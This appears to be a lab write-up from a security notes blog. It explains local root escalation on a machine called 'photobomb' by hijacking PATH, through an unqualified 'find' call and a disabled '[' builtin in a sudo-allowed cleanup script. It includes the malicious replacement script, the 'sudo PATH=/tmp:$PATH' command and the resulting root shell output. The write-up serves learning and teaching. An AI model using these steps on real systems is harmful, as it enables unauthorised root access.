HOMESERVICESBLOG

Path Variable Hijacking

Absolute Path

After foothold, the user could execute a bash file as root.

Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

We can also set a new PATH variable "SETENV:". Let's take a look at the file contents.

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find <---- source_images -type f -name '*.jpg' -exec chown root:root {} \;

Looking through the file we can see that the find command on the last line is not using an absolute path which we can abuse to get root. We can create a malicious file named "find" under /tmp and make it executable and execute any command through it. In this case, I'll create a file with the following contents.

#!/bin/bash
bash

time to get root.

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Shell Builtins

In bash, Shell builtin is a command or a function, called from a shell, that is executed directly in the shell itself, instead of an external executable program which the shell would load and execute

SHELL BUILTIN COMMANDS
       <... SNIP ...>  The :, true, false, and test/[ builtins do not accept
       options and do not treat -- especially.

So if we do which on [ the result will reveal that it's and actual file.

$ which [
/usr/bin/[

Now if we take a look at the file content of cleanup.sh from Absolute Path.

#!/bin/bash
. /opt/.bashrc <----
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

This file is executing /opt/.bashrc file. Let's take a look at the .bashrc file.

# System-wide .bashrc file for interactive bash(1) shells.

# To enable the settings / commands in this file for login shells as well,
# this file has to be sourced in /etc/profile.

# Jameson: ensure that snaps don't interfere, 'cos they are dumb
PATH=${PATH/:\/snap\/bin/}

# Jameson: caused problems with testing whether to rotate the log file
enable -n [ # ] <-----

The last line is disabling the bash builtin. Let me explain. Create a file with the name [ and make it executable under /tmp.

# if we do this it'll give an error
/tmp$ [
bash: [: missing `]'

# In order to execute our file we have to type like ./[ right so if we do 
/tmp$ enable -n [

# Now if we type [ in the command line it will execute the file.

Following this, if we execute the following command it'll pop a root shell because of this line.

if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]

The [ in the cleanup.sh file will execute a malicious file that we created.

/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
/tmp# id
uid=0(root) gid=0(root) groups=0(root)
PreviousLinux Privilege EscalationNextDocker

Last updated